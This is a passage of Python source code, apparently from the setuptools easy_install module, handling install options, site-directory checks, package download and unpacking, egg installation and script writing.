doing automatic download/extract/build of distutils-based Python\npackages. For detailed documentation, see the accompanying EasyInstall.txt\nfile, or visit the `EasyInstall home page`__.\n\n__ https://pythonhosted.org/setuptools/easy_install.html\n\n\"\"\"\n\nfrom glob import glob\nfrom distutils.util import get_platform\nfrom distutils.util import convert_path, subst_vars\nfrom distutils.errors import DistutilsArgError, DistutilsOptionError, \\\n DistutilsError, DistutilsPlatformError\nfrom distutils.command.install import INSTALL_SCHEMES, SCHEME_KEYS\nfrom distutils import log, dir_util\nfrom distutils.command.build_scripts import first_line_re\nimport sys\nimport os\nimport zipimport\nimport shutil\nimport tempfile\nimport zipfile\nimport re\nimport stat\nimport random\nimport platform\nimport textwrap\nimport warnings\nimport site\nimport struct\nimport contextlib\n\nfrom setuptools import Command\nfrom setuptools.sandbox import run_setup\nfrom setuptools.py31compat import get_path, get_config_vars\nfrom setuptools.command import setopt\nfrom setuptools.archive_util import unpack_archive\nfrom setuptools.package_index import PackageIndex\nfrom setuptools.package_index import URL_SCHEME\nfrom setuptools.command import bdist_egg, egg_info\nfrom setuptools.compat import (iteritems, maxsize, basestring, unicode,\n reraise, PY2, PY3)\nfrom pkg_resources import (\n yield_lines, normalize_path, resource_string, ensure_directory,\n get_distribution, find_distributions, Environment, Requirement,\n Distribution, PathMetadata, EggMetadata, WorkingSet, DistributionNotFound,\n VersionConflict, DEVELOP_DIST,\n)\nimport pkg_resources\n\n\n# Turn on PEP440Warnings\nwarnings.filterwarnings(\"default\", category=pkg_resources.PEP440Warning)\n\n\nsys_executable = os.environ.get('__PYVENV_LAUNCHER__',\n os.path.normpath(sys.executable))\n\n\n__all__ = [\n 'samefile', 'easy_install', 'PthDistributions', 'extract_wininst_cfg',\n 'main', 'get_exe_prefixes',\n]\n\n\ndef is_64bit():\n return struct.calcsize(\"P\") == 8\n\n\ndef samefile(p1, p2):\n both_exist = os.path.exists(p1) and os.path.exists(p2)\n use_samefile = hasattr(os.path, 'samefile') and both_exist\n if use_samefile:\n return os.path.samefile(p1, p2)\n norm_p1 = os.path.normpath(os.path.normcase(p1))\n norm_p2 = os.path.normpath(os.path.normcase(p2))\n return norm_p1 == norm_p2\n\n\nif PY2:\n def _to_ascii(s):\n return s\n\n def isascii(s):\n try:\n unicode(s, 'ascii')\n return True\n except UnicodeError:\n return False\nelse:\n def _to_ascii(s):\n return s.encode('ascii')\n\n def isascii(s):\n try:\n s.encode('ascii')\n return True\n except UnicodeError:\n return False\n\n\nclass easy_install(Command):\n \"\"\"Manage a download/build/install process\"\"\"\n description = \"Find/get/install Python packages\"\n command_consumes_arguments = True\n\n user_options = [\n ('prefix=', None, \"installation prefix\"),\n (\"zip-ok\", \"z\", \"install package as a zipfile\"),\n (\"multi-version\", \"m\", \"make apps have to require() a version\"),\n (\"upgrade\", \"U\", \"force upgrade (searches PyPI for latest versions)\"),\n (\"install-dir=\", \"d\", \"install package to DIR\"),\n (\"script-dir=\", \"s\", \"install scripts to DIR\"),\n (\"exclude-scripts\", \"x\", \"Don't install scripts\"),\n (\"always-copy\", \"a\", \"Copy all needed packages to install dir\"),\n (\"index-url=\", \"i\", \"base URL of Python Package Index\"),\n (\"find-links=\", \"f\", \"additional URL(s) to search for packages\"),\n (\"build-directory=\", \"b\",\n 
\"download/extract/build in DIR; keep the results\"),\n ('optimize=', 'O',\n \"also compile with optimization: -O1 for \\\"python -O\\\", \"\n \"-O2 for \\\"python -OO\\\", and -O0 to disable [default: -O0]\"),\n ('record=', None,\n \"filename in which to record list of installed files\"),\n ('always-unzip', 'Z', \"don't install as a zipfile, no matter what\"),\n ('site-dirs=', 'S', \"list of directories where .pth files work\"),\n ('editable', 'e', \"Install specified packages in editable form\"),\n ('no-deps', 'N', \"don't install dependencies\"),\n ('allow-hosts=', 'H', \"pattern(s) that hostnames must match\"),\n ('local-snapshots-ok', 'l',\n \"allow building eggs from local checkouts\"),\n ('version', None, \"print version information and exit\"),\n ('no-find-links', None,\n \"Don't load find-links defined in packages being installed\")\n ]\n boolean_options = [\n 'zip-ok', 'multi-version', 'exclude-scripts', 'upgrade', 'always-copy',\n 'editable',\n 'no-deps', 'local-snapshots-ok', 'version'\n ]\n\n if site.ENABLE_USER_SITE:\n help_msg = \"install in user site-package '%s'\" % site.USER_SITE\n user_options.append(('user', None, help_msg))\n boolean_options.append('user')\n\n negative_opt = {'always-unzip': 'zip-ok'}\n create_index = PackageIndex\n\n def initialize_options(self):\n if site.ENABLE_USER_SITE:\n whereami = os.path.abspath(__file__)\n self.user = whereami.startswith(site.USER_SITE)\n else:\n self.user = 0\n\n self.zip_ok = self.local_snapshots_ok = None\n self.install_dir = self.script_dir = self.exclude_scripts = None\n self.index_url = None\n self.find_links = None\n self.build_directory = None\n self.args = None\n self.optimize = self.record = None\n self.upgrade = self.always_copy = self.multi_version = None\n self.editable = self.no_deps = self.allow_hosts = None\n self.root = self.prefix = self.no_report = None\n self.version = None\n self.install_purelib = None # for pure module distributions\n self.install_platlib = None # non-pure (dists w/ extensions)\n self.install_headers = None # for C/C++ headers\n self.install_lib = None # set to either purelib or platlib\n self.install_scripts = None\n self.install_data = None\n self.install_base = None\n self.install_platbase = None\n if site.ENABLE_USER_SITE:\n self.install_userbase = site.USER_BASE\n self.install_usersite = site.USER_SITE\n else:\n self.install_userbase = None\n self.install_usersite = None\n self.no_find_links = None\n\n # Options not specifiable via command line\n self.package_index = None\n self.pth_file = self.always_copy_from = None\n self.site_dirs = None\n self.installed_projects = {}\n self.sitepy_installed = False\n # Always read easy_install options, even if we are subclassed, or have\n # an independent instance created. 
This ensures that defaults will\n # always come from the standard configuration file(s)' \"easy_install\"\n # section, even if this is a \"develop\" or \"install\" command, or some\n # other embedding.\n self._dry_run = None\n self.verbose = self.distribution.verbose\n self.distribution._set_command_options(\n self, self.distribution.get_option_dict('easy_install')\n )\n\n def delete_blockers(self, blockers):\n for filename in blockers:\n if os.path.exists(filename) or os.path.islink(filename):\n log.info(\"Deleting %s\", filename)\n if not self.dry_run:\n if (os.path.isdir(filename) and\n not os.path.islink(filename)):\n rmtree(filename)\n else:\n os.unlink(filename)\n\n def finalize_options(self):\n if self.version:\n print('setuptools %s' % get_distribution('setuptools').version)\n sys.exit()\n\n py_version = sys.version.split()[0]\n prefix, exec_prefix = get_config_vars('prefix', 'exec_prefix')\n\n self.config_vars = {\n 'dist_name': self.distribution.get_name(),\n 'dist_version': self.distribution.get_version(),\n 'dist_fullname': self.distribution.get_fullname(),\n 'py_version': py_version,\n 'py_version_short': py_version[0:3],\n 'py_version_nodot': py_version[0] + py_version[2],\n 'sys_prefix': prefix,\n 'prefix': prefix,\n 'sys_exec_prefix': exec_prefix,\n 'exec_prefix': exec_prefix,\n # Only python 3.2+ has abiflags\n 'abiflags': getattr(sys, 'abiflags', ''),\n }\n\n if site.ENABLE_USER_SITE:\n self.config_vars['userbase'] = self.install_userbase\n self.config_vars['usersite'] = self.install_usersite\n\n # fix the install_dir if \"--user\" was used\n # XXX: duplicate of the code in the setup command\n if self.user and site.ENABLE_USER_SITE:\n self.create_home_path()\n if self.install_userbase is None:\n raise DistutilsPlatformError(\n \"User base directory is not specified\")\n self.install_base = self.install_platbase = self.install_userbase\n if os.name == 'posix':\n self.select_scheme(\"unix_user\")\n else:\n self.select_scheme(os.name + \"_user\")\n\n self.expand_basedirs()\n self.expand_dirs()\n\n self._expand('install_dir', 'script_dir', 'build_directory',\n 'site_dirs')\n # If a non-default installation directory was specified, default the\n # script directory to match it.\n if self.script_dir is None:\n self.script_dir = self.install_dir\n\n if self.no_find_links is None:\n self.no_find_links = False\n\n # Let install_dir get set by install_lib command, which in turn\n # gets its info from the install command, and takes into account\n # --prefix and --home and all that other crud.\n self.set_undefined_options(\n 'install_lib', ('install_dir', 'install_dir')\n )\n # Likewise, set default script_dir from 'install_scripts.install_dir'\n self.set_undefined_options(\n 'install_scripts', ('install_dir', 'script_dir')\n )\n\n if self.user and self.install_purelib:\n self.install_dir = self.install_purelib\n self.script_dir = self.install_scripts\n # default --record from the install command\n self.set_undefined_options('install', ('record', 'record'))\n # Should this be moved to the if statement below? 
It's not used\n # elsewhere\n normpath = map(normalize_path, sys.path)\n self.all_site_dirs = get_site_dirs()\n if self.site_dirs is not None:\n site_dirs = [\n os.path.expanduser(s.strip()) for s in\n self.site_dirs.split(',')\n ]\n for d in site_dirs:\n if not os.path.isdir(d):\n log.warn(\"%s (in --site-dirs) does not exist\", d)\n elif normalize_path(d) not in normpath:\n raise DistutilsOptionError(\n d + \" (in --site-dirs) is not on sys.path\"\n )\n else:\n self.all_site_dirs.append(normalize_path(d))\n if not self.editable:\n self.check_site_dir()\n self.index_url = self.index_url or \"https://pypi.python.org/simple\"\n self.shadow_path = self.all_site_dirs[:]\n for path_item in self.install_dir, normalize_path(self.script_dir):\n if path_item not in self.shadow_path:\n self.shadow_path.insert(0, path_item)\n\n if self.allow_hosts is not None:\n hosts = [s.strip() for s in self.allow_hosts.split(',')]\n else:\n hosts = ['*']\n if self.package_index is None:\n self.package_index = self.create_index(\n self.index_url, search_path=self.shadow_path, hosts=hosts,\n )\n self.local_index = Environment(self.shadow_path + sys.path)\n\n if self.find_links is not None:\n if isinstance(self.find_links, basestring):\n self.find_links = self.find_links.split()\n else:\n self.find_links = []\n if self.local_snapshots_ok:\n self.package_index.scan_egg_links(self.shadow_path + sys.path)\n if not self.no_find_links:\n self.package_index.add_find_links(self.find_links)\n self.set_undefined_options('install_lib', ('optimize', 'optimize'))\n if not isinstance(self.optimize, int):\n try:\n self.optimize = int(self.optimize)\n if not (0 <= self.optimize <= 2):\n raise ValueError\n except ValueError:\n raise DistutilsOptionError(\"--optimize must be 0, 1, or 2\")\n\n if self.editable and not self.build_directory:\n raise DistutilsArgError(\n \"Must specify a build directory (-b) when using --editable\"\n )\n if not self.args:\n raise DistutilsArgError(\n \"No urls, filenames, or requirements specified (see --help)\")\n\n self.outputs = []\n\n def _expand_attrs(self, attrs):\n for attr in attrs:\n val = getattr(self, attr)\n if val is not None:\n if os.name == 'posix' or os.name == 'nt':\n val = os.path.expanduser(val)\n val = subst_vars(val, self.config_vars)\n setattr(self, attr, val)\n\n def expand_basedirs(self):\n \"\"\"Calls `os.path.expanduser` on install_base, install_platbase and\n root.\"\"\"\n self._expand_attrs(['install_base', 'install_platbase', 'root'])\n\n def expand_dirs(self):\n \"\"\"Calls `os.path.expanduser` on install dirs.\"\"\"\n self._expand_attrs(['install_purelib', 'install_platlib',\n 'install_lib', 'install_headers',\n 'install_scripts', 'install_data', ])\n\n def run(self):\n if self.verbose != self.distribution.verbose:\n log.set_verbosity(self.verbose)\n try:\n for spec in self.args:\n self.easy_install(spec, not self.no_deps)\n if self.record:\n outputs = self.outputs\n if self.root: # strip any package prefix\n root_len = len(self.root)\n for counter in range(len(outputs)):\n outputs[counter] = outputs[counter][root_len:]\n from distutils import file_util\n\n self.execute(\n file_util.write_file, (self.record, outputs),\n \"writing list of installed files to '%s'\" %\n self.record\n )\n self.warn_deprecated_options()\n finally:\n log.set_verbosity(self.distribution.verbose)\n\n def pseudo_tempname(self):\n \"\"\"Return a pseudo-tempname base in the install directory.\n This code is intentionally naive; if a malicious party can write to\n the target directory you're already 
in deep doodoo.\n \"\"\"\n try:\n pid = os.getpid()\n except:\n pid = random.randint(0, maxsize)\n return os.path.join(self.install_dir, \"test-easy-install-%s\" % pid)\n\n def warn_deprecated_options(self):\n pass\n\n def check_site_dir(self):\n \"\"\"Verify that self.install_dir is .pth-capable dir, if needed\"\"\"\n\n instdir = normalize_path(self.install_dir)\n pth_file = os.path.join(instdir, 'easy-install.pth')\n\n # Is it a configured, PYTHONPATH, implicit, or explicit site dir?\n is_site_dir = instdir in self.all_site_dirs\n\n if not is_site_dir and not self.multi_version:\n # No? Then directly test whether it does .pth file processing\n is_site_dir = self.check_pth_processing()\n else:\n # make sure we can write to target dir\n testfile = self.pseudo_tempname() + '.write-test'\n test_exists = os.path.exists(testfile)\n try:\n if test_exists:\n os.unlink(testfile)\n open(testfile, 'w').close()\n os.unlink(testfile)\n except (OSError, IOError):\n self.cant_write_to_target()\n\n if not is_site_dir and not self.multi_version:\n # Can't install non-multi to non-site dir\n raise DistutilsError(self.no_default_version_msg())\n\n if is_site_dir:\n if self.pth_file is None:\n self.pth_file = PthDistributions(pth_file, self.all_site_dirs)\n else:\n self.pth_file = None\n\n PYTHONPATH = os.environ.get('PYTHONPATH', '').split(os.pathsep)\n if instdir not in map(normalize_path, [_f for _f in PYTHONPATH if _f]):\n # only PYTHONPATH dirs need a site.py, so pretend it's there\n self.sitepy_installed = True\n elif self.multi_version and not os.path.exists(pth_file):\n self.sitepy_installed = True # don't need site.py in this case\n self.pth_file = None # and don't create a .pth file\n self.install_dir = instdir\n\n def cant_write_to_target(self):\n template = \"\"\"can't create or remove files in install directory\n\nThe following error occurred while trying to add or remove files in the\ninstallation directory:\n\n %s\n\nThe installation directory you specified (via --install-dir, --prefix, or\nthe distutils default setting) was:\n\n %s\n\"\"\"\n msg = template % (sys.exc_info()[1], self.install_dir,)\n\n if not os.path.exists(self.install_dir):\n msg += \"\"\"\nThis directory does not currently exist. Please create it and try again, or\nchoose a different installation directory (using the -d or --install-dir\noption).\n\"\"\"\n else:\n msg += \"\"\"\nPerhaps your account does not have write access to this directory? If the\ninstallation directory is a system-owned directory, you may need to sign in\nas the administrator or \"root\" account. If you do not have administrative\naccess to this machine, you may wish to choose a different installation\ndirectory, preferably one that is listed in your PYTHONPATH environment\nvariable.\n\nFor information on other options, you may wish to consult the\ndocumentation at:\n\n https://pythonhosted.org/setuptools/easy_install.html\n\nPlease make the appropriate changes for your system and try again.\n\"\"\"\n raise DistutilsError(msg)\n\n def check_pth_processing(self):\n \"\"\"Empirically verify whether .pth files are supported in inst. 
dir\"\"\"\n instdir = self.install_dir\n log.info(\"Checking .pth file support in %s\", instdir)\n pth_file = self.pseudo_tempname() + \".pth\"\n ok_file = pth_file + '.ok'\n ok_exists = os.path.exists(ok_file)\n try:\n if ok_exists:\n os.unlink(ok_file)\n dirname = os.path.dirname(ok_file)\n if not os.path.exists(dirname):\n os.makedirs(dirname)\n f = open(pth_file, 'w')\n except (OSError, IOError):\n self.cant_write_to_target()\n else:\n try:\n f.write(\"import os; f = open(%r, 'w'); f.write('OK'); \"\n \"f.close()\\n\" % (ok_file,))\n f.close()\n f = None\n executable = sys.executable\n if os.name == 'nt':\n dirname, basename = os.path.split(executable)\n alt = os.path.join(dirname, 'pythonw.exe')\n if (basename.lower() == 'python.exe' and\n os.path.exists(alt)):\n # use pythonw.exe to avoid opening a console window\n executable = alt\n\n from distutils.spawn import spawn\n\n spawn([executable, '-E', '-c', 'pass'], 0)\n\n if os.path.exists(ok_file):\n log.info(\n \"TEST PASSED: %s appears to support .pth files\",\n instdir\n )\n return True\n finally:\n if f:\n f.close()\n if os.path.exists(ok_file):\n os.unlink(ok_file)\n if os.path.exists(pth_file):\n os.unlink(pth_file)\n if not self.multi_version:\n log.warn(\"TEST FAILED: %s does NOT support .pth files\", instdir)\n return False\n\n def install_egg_scripts(self, dist):\n \"\"\"Write all the scripts for `dist`, unless scripts are excluded\"\"\"\n if not self.exclude_scripts and dist.metadata_isdir('scripts'):\n for script_name in dist.metadata_listdir('scripts'):\n if dist.metadata_isdir('scripts/' + script_name):\n # The \"script\" is a directory, likely a Python 3\n # __pycache__ directory, so skip it.\n continue\n self.install_script(\n dist, script_name,\n dist.get_metadata('scripts/' + script_name)\n )\n self.install_wrapper_scripts(dist)\n\n def add_output(self, path):\n if os.path.isdir(path):\n for base, dirs, files in os.walk(path):\n for filename in files:\n self.outputs.append(os.path.join(base, filename))\n else:\n self.outputs.append(path)\n\n def not_editable(self, spec):\n if self.editable:\n raise DistutilsArgError(\n \"Invalid argument %r: you can't use filenames or URLs \"\n \"with --editable (except via the --find-links option).\"\n % (spec,)\n )\n\n def check_editable(self, spec):\n if not self.editable:\n return\n\n if os.path.exists(os.path.join(self.build_directory, spec.key)):\n raise DistutilsArgError(\n \"%r already exists in %s; can't do a checkout there\" %\n (spec.key, self.build_directory)\n )\n\n def easy_install(self, spec, deps=False):\n tmpdir = tempfile.mkdtemp(prefix=\"easy_install-\")\n download = None\n if not self.editable:\n self.install_site_py()\n\n try:\n if not isinstance(spec, Requirement):\n if URL_SCHEME(spec):\n # It's a url, download it to tmpdir and process\n self.not_editable(spec)\n download = self.package_index.download(spec, tmpdir)\n return self.install_item(None, download, tmpdir, deps,\n True)\n\n elif os.path.exists(spec):\n # Existing file or directory, just process it directly\n self.not_editable(spec)\n return self.install_item(None, spec, tmpdir, deps, True)\n else:\n spec = parse_requirement_arg(spec)\n\n self.check_editable(spec)\n dist = self.package_index.fetch_distribution(\n spec, tmpdir, self.upgrade, self.editable,\n not self.always_copy, self.local_index\n )\n if dist is None:\n msg = \"Could not find suitable distribution for %r\" % spec\n if self.always_copy:\n msg += \" (--always-copy skips system and development eggs)\"\n raise DistutilsError(msg)\n elif 
dist.precedence == DEVELOP_DIST:\n # .egg-info dists don't need installing, just process deps\n self.process_distribution(spec, dist, deps, \"Using\")\n return dist\n else:\n return self.install_item(spec, dist.location, tmpdir, deps)\n\n finally:\n if os.path.exists(tmpdir):\n rmtree(tmpdir)\n\n def install_item(self, spec, download, tmpdir, deps, install_needed=False):\n\n # Installation is also needed if file in tmpdir or is not an egg\n install_needed = install_needed or self.always_copy\n install_needed = install_needed or os.path.dirname(download) == tmpdir\n install_needed = install_needed or not download.endswith('.egg')\n install_needed = install_needed or (\n self.always_copy_from is not None and\n os.path.dirname(normalize_path(download)) ==\n normalize_path(self.always_copy_from)\n )\n\n if spec and not install_needed:\n # at this point, we know it's a local .egg, we just don't know if\n # it's already installed.\n for dist in self.local_index[spec.project_name]:\n if dist.location == download:\n break\n else:\n install_needed = True # it's not in the local index\n\n log.info(\"Processing %s\", os.path.basename(download))\n\n if install_needed:\n dists = self.install_eggs(spec, download, tmpdir)\n for dist in dists:\n self.process_distribution(spec, dist, deps)\n else:\n dists = [self.egg_distribution(download)]\n self.process_distribution(spec, dists[0], deps, \"Using\")\n\n if spec is not None:\n for dist in dists:\n if dist in spec:\n return dist\n\n def select_scheme(self, name):\n \"\"\"Sets the install directories by applying the install schemes.\"\"\"\n # it's the caller's problem if they supply a bad name!\n scheme = INSTALL_SCHEMES[name]\n for key in SCHEME_KEYS:\n attrname = 'install_' + key\n if getattr(self, attrname) is None:\n setattr(self, attrname, scheme[key])\n\n def process_distribution(self, requirement, dist, deps=True, *info):\n self.update_pth(dist)\n self.package_index.add(dist)\n if dist in self.local_index[dist.key]:\n self.local_index.remove(dist)\n self.local_index.add(dist)\n self.install_egg_scripts(dist)\n self.installed_projects[dist.key] = dist\n log.info(self.installation_report(requirement, dist, *info))\n if (dist.has_metadata('dependency_links.txt') and\n not self.no_find_links):\n self.package_index.add_find_links(\n dist.get_metadata_lines('dependency_links.txt')\n )\n if not deps and not self.always_copy:\n return\n elif requirement is not None and dist.key != requirement.key:\n log.warn(\"Skipping dependencies for %s\", dist)\n return # XXX this is not the distribution we were looking for\n elif requirement is None or dist not in requirement:\n # if we wound up with a different version, resolve what we've got\n distreq = dist.as_requirement()\n requirement = requirement or distreq\n requirement = Requirement(\n distreq.project_name, distreq.specs, requirement.extras\n )\n log.info(\"Processing dependencies for %s\", requirement)\n try:\n distros = WorkingSet([]).resolve(\n [requirement], self.local_index, self.easy_install\n )\n except DistributionNotFound:\n e = sys.exc_info()[1]\n raise DistutilsError(\n \"Could not find required distribution %s\" % e.args\n )\n except VersionConflict:\n e = sys.exc_info()[1]\n raise DistutilsError(\n \"Installed distribution %s conflicts with requirement %s\"\n % e.args\n )\n if self.always_copy or self.always_copy_from:\n # Force all the relevant distros to be copied or activated\n for dist in distros:\n if dist.key not in self.installed_projects:\n self.easy_install(dist.as_requirement())\n 
log.info(\"Finished processing dependencies for %s\", requirement)\n\n def should_unzip(self, dist):\n if self.zip_ok is not None:\n return not self.zip_ok\n if dist.has_metadata('not-zip-safe'):\n return True\n if not dist.has_metadata('zip-safe'):\n return True\n return False\n\n def maybe_move(self, spec, dist_filename, setup_base):\n dst = os.path.join(self.build_directory, spec.key)\n if os.path.exists(dst):\n msg = (\"%r already exists in %s; build directory %s will not be \"\n \"kept\")\n log.warn(msg, spec.key, self.build_directory, setup_base)\n return setup_base\n if os.path.isdir(dist_filename):\n setup_base = dist_filename\n else:\n if os.path.dirname(dist_filename) == setup_base:\n os.unlink(dist_filename) # get it out of the tmp dir\n contents = os.listdir(setup_base)\n if len(contents) == 1:\n dist_filename = os.path.join(setup_base, contents[0])\n if os.path.isdir(dist_filename):\n # if the only thing there is a directory, move it instead\n setup_base = dist_filename\n ensure_directory(dst)\n shutil.move(setup_base, dst)\n return dst\n\n def install_wrapper_scripts(self, dist):\n if not self.exclude_scripts:\n for args in get_script_args(dist):\n self.write_script(*args)\n\n def install_script(self, dist, script_name, script_text, dev_path=None):\n \"\"\"Generate a legacy script wrapper and install it\"\"\"\n spec = str(dist.as_requirement())\n is_script = is_python_script(script_text, script_name)\n\n if is_script:\n script_text = (get_script_header(script_text) +\n self._load_template(dev_path) % locals())\n self.write_script(script_name, _to_ascii(script_text), 'b')\n\n @staticmethod\n def _load_template(dev_path):\n \"\"\"\n There are a couple of template scripts in the package. This\n function loads one of them and prepares it for use.\n \"\"\"\n # See https://bitbucket.org/pypa/setuptools/issue/134 for info\n # on script file naming and downstream issues with SVR4\n name = 'script.tmpl'\n if dev_path:\n name = name.replace('.tmpl', ' (dev).tmpl')\n\n raw_bytes = resource_string('setuptools', name)\n return raw_bytes.decode('utf-8')\n\n def write_script(self, script_name, contents, mode=\"t\", blockers=()):\n \"\"\"Write an executable file to the scripts directory\"\"\"\n self.delete_blockers( # clean up old .py/.pyw w/o a script\n [os.path.join(self.script_dir, x) for x in blockers]\n )\n log.info(\"Installing %s script to %s\", script_name, self.script_dir)\n target = os.path.join(self.script_dir, script_name)\n self.add_output(target)\n\n mask = current_umask()\n if not self.dry_run:\n ensure_directory(target)\n if os.path.exists(target):\n os.unlink(target)\n f = open(target, \"w\" + mode)\n f.write(contents)\n f.close()\n chmod(target, 0o777 - mask)\n\n def install_eggs(self, spec, dist_filename, tmpdir):\n # .egg dirs or files are already built, so just return them\n if dist_filename.lower().endswith('.egg'):\n return [self.install_egg(dist_filename, tmpdir)]\n elif dist_filename.lower().endswith('.exe'):\n return [self.install_exe(dist_filename, tmpdir)]\n\n # Anything else, try to extract and build\n setup_base = tmpdir\n if os.path.isfile(dist_filename) and not dist_filename.endswith('.py'):\n unpack_archive(dist_filename, tmpdir, self.unpack_progress)\n elif os.path.isdir(dist_filename):\n setup_base = os.path.abspath(dist_filename)\n\n if (setup_base.startswith(tmpdir) # something we downloaded\n and self.build_directory and spec is not None):\n setup_base = self.maybe_move(spec, dist_filename, setup_base)\n\n # Find the setup.py file\n setup_script = 
os.path.join(setup_base, 'setup.py')\n\n if not os.path.exists(setup_script):\n setups = glob(os.path.join(setup_base, '*', 'setup.py'))\n if not setups:\n raise DistutilsError(\n \"Couldn't find a setup script in %s\" %\n os.path.abspath(dist_filename)\n )\n if len(setups) > 1:\n raise DistutilsError(\n \"Multiple setup scripts in %s\" %\n os.path.abspath(dist_filename)\n )\n setup_script = setups[0]\n\n # Now run it, and return the result\n if self.editable:\n log.info(self.report_editable(spec, setup_script))\n return []\n else:\n return self.build_and_install(setup_script, setup_base)\n\n def egg_distribution(self, egg_path):\n if os.path.isdir(egg_path):\n metadata = PathMetadata(egg_path, os.path.join(egg_path,\n 'EGG-INFO'))\n else:\n metadata = EggMetadata(zipimport.zipimporter(egg_path))\n return Distribution.from_filename(egg_path, metadata=metadata)\n\n def install_egg(self, egg_path, tmpdir):\n destination = os.path.join(self.install_dir,\n os.path.basename(egg_path))\n destination = os.path.abspath(destination)\n if not self.dry_run:\n ensure_directory(destination)\n\n dist = self.egg_distribution(egg_path)\n if not samefile(egg_path, destination):\n if os.path.isdir(destination) and not os.path.islink(destination):\n dir_util.remove_tree(destination, dry_run=self.dry_run)\n elif os.path.exists(destination):\n self.execute(os.unlink, (destination,), \"Removing \" +\n destination)\n try:\n new_dist_is_zipped = False\n if os.path.isdir(egg_path):\n if egg_path.startswith(tmpdir):\n f, m = shutil.move, \"Moving\"\n else:\n f, m = shutil.copytree, \"Copying\"\n elif self.should_unzip(dist):\n self.mkpath(destination)\n f, m = self.unpack_and_compile, \"Extracting\"\n else:\n new_dist_is_zipped = True\n if egg_path.startswith(tmpdir):\n f, m = shutil.move, \"Moving\"\n else:\n f, m = shutil.copy2, \"Copying\"\n self.execute(f, (egg_path, destination),\n (m + \" %s to %s\") %\n (os.path.basename(egg_path),\n os.path.dirname(destination)))\n update_dist_caches(destination,\n fix_zipimporter_caches=new_dist_is_zipped)\n except:\n update_dist_caches(destination, fix_zipimporter_caches=False)\n raise\n\n self.add_output(destination)\n return self.egg_distribution(destination)\n\n def install_exe(self, dist_filename, tmpdir):\n # See if it's valid, get data\n cfg = extract_wininst_cfg(dist_filename)\n if cfg is None:\n raise DistutilsError(\n \"%s is not a valid distutils Windows .exe\" % dist_filename\n )\n # Create a dummy distribution object until we build the real distro\n dist = Distribution(\n None,\n project_name=cfg.get('metadata', 'name'),\n version=cfg.get('metadata', 'version'), platform=get_platform(),\n )\n\n # Convert the .exe to an unpacked egg\n egg_path = dist.location = os.path.join(tmpdir, dist.egg_name() +\n '.egg')\n egg_tmp = egg_path + '.tmp'\n _egg_info = os.path.join(egg_tmp, 'EGG-INFO')\n pkg_inf = os.path.join(_egg_info, 'PKG-INFO')\n ensure_directory(pkg_inf) # make sure EGG-INFO dir exists\n dist._provider = PathMetadata(egg_tmp, _egg_info) # XXX\n self.exe_to_egg(dist_filename, egg_tmp)\n\n # Write EGG-INFO/PKG-INFO\n if not os.path.exists(pkg_inf):\n f = open(pkg_inf, 'w')\n f.write('Metadata-Version: 1.0\\n')\n for k, v in cfg.items('metadata'):\n if k != 'target_version':\n f.write('%s: %s\\n' % (k.replace('_', '-').title(), v))\n f.close()\n script_dir = os.path.join(_egg_info, 'scripts')\n self.delete_blockers( # delete entry-point scripts to avoid duping\n [os.path.join(script_dir, args[0]) for args in\n get_script_args(dist)]\n )\n # Build .egg file 
from tmpdir\n bdist_egg.make_zipfile(\n egg_path, egg_tmp, verbose=self.verbose, dry_run=self.dry_run\n )\n # install the .egg\n return self.install_egg(egg_path, tmpdir)\n\n def exe_to_egg(self, dist_filename, egg_tmp):\n \"\"\"Extract a bdist_wininst to the directories an egg would use\"\"\"\n # Check for .pth file and set up prefix translations\n prefixes = get_exe_prefixes(dist_filename)\n to_compile = []\n native_libs = []\n top_level = {}\n\n def process(src, dst):\n s = src.lower()\n for old, new in prefixes:\n if s.startswith(old):\n src = new + src[len(old):]\n parts = src.split('/')\n dst = os.path.join(egg_tmp, *parts)\n dl = dst.lower()\n if dl.endswith('.pyd') or dl.endswith('.dll'):\n parts[-1] = bdist_egg.strip_module(parts[-1])\n top_level[os.path.splitext(parts[0])[0]] = 1\n native_libs.append(src)\n elif dl.endswith('.py') and old != 'SCRIPTS/':\n top_level[os.path.splitext(parts[0])[0]] = 1\n to_compile.append(dst)\n return dst\n if not src.endswith('.pth'):\n log.warn(\"WARNING: can't process %s\", src)\n return None\n\n # extract, tracking .pyd/.dll->native_libs and .py -> to_compile\n unpack_archive(dist_filename, egg_tmp, process)\n stubs = []\n for res in native_libs:\n if res.lower().endswith('.pyd'): # create stubs for .pyd's\n parts = res.split('/')\n resource = parts[-1]\n parts[-1] = bdist_egg.strip_module(parts[-1]) + '.py'\n pyfile = os.path.join(egg_tmp, *parts)\n to_compile.append(pyfile)\n stubs.append(pyfile)\n bdist_egg.write_stub(resource, pyfile)\n self.byte_compile(to_compile) # compile .py's\n bdist_egg.write_safety_flag(\n os.path.join(egg_tmp, 'EGG-INFO'),\n bdist_egg.analyze_egg(egg_tmp, stubs)) # write zip-safety flag\n\n for name in 'top_level', 'native_libs':\n if locals()[name]:\n txt = os.path.join(egg_tmp, 'EGG-INFO', name + '.txt')\n if not os.path.exists(txt):\n f = open(txt, 'w')\n f.write('\\n'.join(locals()[name]) + '\\n')\n f.close()\n\n def installation_report(self, req, dist, what=\"Installed\"):\n \"\"\"Helpful installation message for display to package users\"\"\"\n msg = \"\\n%(what)s %(eggloc)s%(extras)s\"\n if self.multi_version and not self.no_report:\n msg += \"\"\"\n\nBecause this distribution was installed --multi-version, before you can\nimport modules from this package in an application, you will need to\n'import pkg_resources' and then use a 'require()' call similar to one of\nthese examples, in order to select the desired version:\n\n pkg_resources.require(\"%(name)s\") # latest installed version\n pkg_resources.require(\"%(name)s==%(version)s\") # this exact version\n pkg_resources.require(\"%(name)s>=%(version)s\") # this version or higher\n\"\"\"\n if self.install_dir not in map(normalize_path, sys.path):\n msg += \"\"\"\n\nNote also that the installation directory must be on sys.path at runtime for\nthis to work. (e.g. 
